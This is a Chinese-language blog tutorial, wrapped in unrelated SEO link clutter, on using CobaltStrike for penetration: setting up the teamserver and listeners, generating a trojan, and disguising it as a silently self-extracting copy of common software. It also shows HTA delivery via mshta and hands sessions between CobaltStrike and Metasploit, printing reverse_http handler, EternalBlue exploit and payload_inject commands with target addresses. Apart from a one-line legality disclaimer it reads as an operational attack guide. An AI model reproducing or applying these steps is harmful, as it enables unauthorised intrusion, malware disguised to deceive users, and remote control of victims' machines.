当前位置: 首页 > news >正文

网站建设开题报告论述安卓aso优化工具

网站建设开题报告论述,安卓aso优化工具,WordPress瀑布流商店博客,java php 大型网站开发目录 CobaltStrike简介 主要功能: 使用注意: 在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。 CobaltStrike安装 前提 安装 服务端安装 windows安装 CS基本使用 监听器配置 一些基本的攻击…

目录

CobaltStrike简介

主要功能:

使用注意:        在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。

CobaltStrike安装

前提

安装

服务端安装

windows安装

CS基本使用

监听器配置

一些基本的攻击

生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)

​编辑

 木马的伪装(自解压安装包设置)

生成hta文件,靶机上线

CS和MSF联动

CS会话传递到MSF上

设置外部监听器

配置msf,msf运行之后会获取会话

设置监听转移,选择外部监听器

结果

msf会话传递至CS上

首先先利用msf上线一台靶机

cs设置监听

msf设置派生

结果


CobaltStrike简介

CobaltStrike(简称CS)是一款专业的团队作战渗透测试工具,包含客户端和服务端两个部分。以下是关于CobaltStrike的简单介绍:

主要功能:

持久化、横向移动:在已经取得攻击目标控制权后,CobaltStrike能够用于在目标系统中保持长期存在,并进行横向移动,扩大攻击范围。

流量隐藏:通过其独特的技术手段,CobaltStrike可以有效地隐藏网络流量,使攻击行为难以被检测和追踪。

数据窃取:CobaltStrike还具备数据窃取能力,能够从目标系统中提取敏感信息。

使用注意:
        在使用CobaltStrike进行渗透测试时,务必遵守法律法规,并获得合法授权。

CobaltStrike安装

前提

在安装CobaltStrike时,设备上需要部署jdk8以上的环境

安装

服务端安装在kali或者云服务器上,客户端安装在Windows上

服务端安装

(下列演示为在kali中安装)

将CobaltStrike安装包中服务端拖进kali中

 在kali桌面文件夹中找到CobaltStrike(以下统称CS)找到teamserver文件,修改文件权限为文件添加执行权限

chmod +x teamserver

执行该文件

./teamserver 本机ip地址 自己设置的密码

 后面会出现如下图所示界面

windows安装

打开CS的客户端,点击如下图框起来的地方

 开始会有如下弹窗

之后会有如下弹窗,下列弹窗中Host填写Server端 IP地址,Port设置为服务端设置端口,Password设置服务端中设置密码,User自己随意设置,然后点击连接

 然后就会出现如下图所示图片

这样就安装成功了

CS基本使用

监听器配置

在CS客户端中点击如下图所示图案

添加会话

一些基本的攻击

生成木马,靶机上线(此次演示木马生成在自己的电脑上,然后双击启动木马)

(木马也可以配合钓鱼攻击生成连接诱导被攻击点击)

选择创建位置

测试是否成功(下列图片测试成功的图片,可以打开机器的文件目录并且对其进行操作)

 木马的伪装(自解压安装包设置)

选择一个木马程序和一个常用的软件,使用winrar软件进行压缩,选择自解压压缩格式选择的这个格式可以让后缀变为exe

点击高级,选择自解压选项

选择解压路径,是一个别人都能访问的路径 ,windows所有人都有的路径就是C:UsersPublic

按照下图设置解压方式

选择解压方式,静默解压

选择更新模式和覆盖模式

设置图标

 

然后点击确定就可以了,然后再修改一下文件名称,他会生成一个如下图所示文件(上面的是正版,下面的是盗版。是不是很像)

上述步骤出来的自解压安装包是会被杀毒软件发现的。如果上述安装包再配合一些其他黑客技术就可以进行一些。。。

生成hta文件,靶机上线

点击生成hta文件

设置监听和脚本语言

设置监听端口

设置监听端口,和hta文件

设置完成后会给你一串网址

复制地址在靶机上使用mshta进行运行

靶机上线成功

上线之后就可以提权进行下一步渗透了

CS和MSF联动

CS会话传递到MSF上

设置外部监听器

配置msf,msf运行之后会获取会话
msf6 > use exploit/multi/handler#下面代码与你在CS中配置有关#payload对应外部监听的payload,lhost配置的是本地地址,lpost要和监听器相同msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpmsf6 exploit(multi/handler) > set lhost 192.168.244.141msf6 exploit(multi/handler) > set lport 8085
设置监听转移,选择外部监听器

结果

会话成功转移到了msf上

msf会话传递至CS上

首先先利用msf上线一台靶机

这里用的是永恒之蓝漏洞上线的一台windows7靶机

msf6 > use exploit/windows/smb/ms17_010_eternalblue 
#设置攻击主机
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.244.146
#设置监听端口
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 8081
#攻击
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
cs设置监听

msf设置派生

在MSF中,exploit/windows/local/payload_inject 模块通常用于在已经获得Windows系统shell访问权限的情况下,向该系统的另一个进程注入一个payload。


#使用该模块可以将 Metasploit 获取到的会话注入到CS中
use exploit/windows/local/payload_inject
#和cs监听器保持一致
set payload windows/meterpreter/reverse_http 
#可以不设置,但是端口不要和CS冲突了。
set prependmigrate true   
# msf所在主机IP  
set lhost xxxx 
#CS上的listen端口
set lport XXX  
#要转发的session
set session 2   
run 
结果

会话已被cs获取

http://www.hkea.cn/news/696366/

相关文章:

  • 怎样找到正规代加工网站百度地图3d实景地图
  • 潍坊网站建设公司网站搭建免费
  • 惠州做网站好的公司下载百度语音导航地图安装
  • 春节网站怎么做小说排行榜百度搜索风云榜
  • 商城服务是什么软件seo是指什么岗位
  • 无锡网站建设有限公司网站快速收录的方法
  • 网站建设通报推广网站多少钱
  • 网络推广公司成都seo排名优化教程
  • 一台手机登录微信网页版西安优化外
  • 如何做旅游攻略网站长沙seo优化推荐
  • 长春火车站电话咨询电话快排seo
  • 龙城建设网站公司网站内容优化方法
  • 南通网站建设搭建网站卖链接
  • 驻马店市做网站seo臻系统
  • 找公司做网站怎么图片都要自己找百度推广官网电话
  • 网站小样用什么做seo外链平台热狗
  • 建站点的步骤sem是什么
  • 深圳专业做网站的衡水网站优化推广
  • 徐汇科技网站建设2345中国最好的网址站
  • 邢台论坛吧百度seo收录软件
  • 做国外服务器网站吗怎么让百度搜索靠前
  • 做动态图网站有哪些自建站怎么推广
  • web网站开发课程设计报告seo技术培训沈阳
  • 会宁网站建设公司网站优化助手
  • 网站设计制作体会2023年5月最新疫情
  • 月亮湾设计有限公司网站南宁seo产品优化服务
  • 福田欧曼服务站电话上海高端seo公司
  • 高端网站建设哪家好谷歌seo和百度seo
  • 前端写一个页面多少钱海口网站关键词优化
  • 浦东新区建设局官方网站东莞seo关键词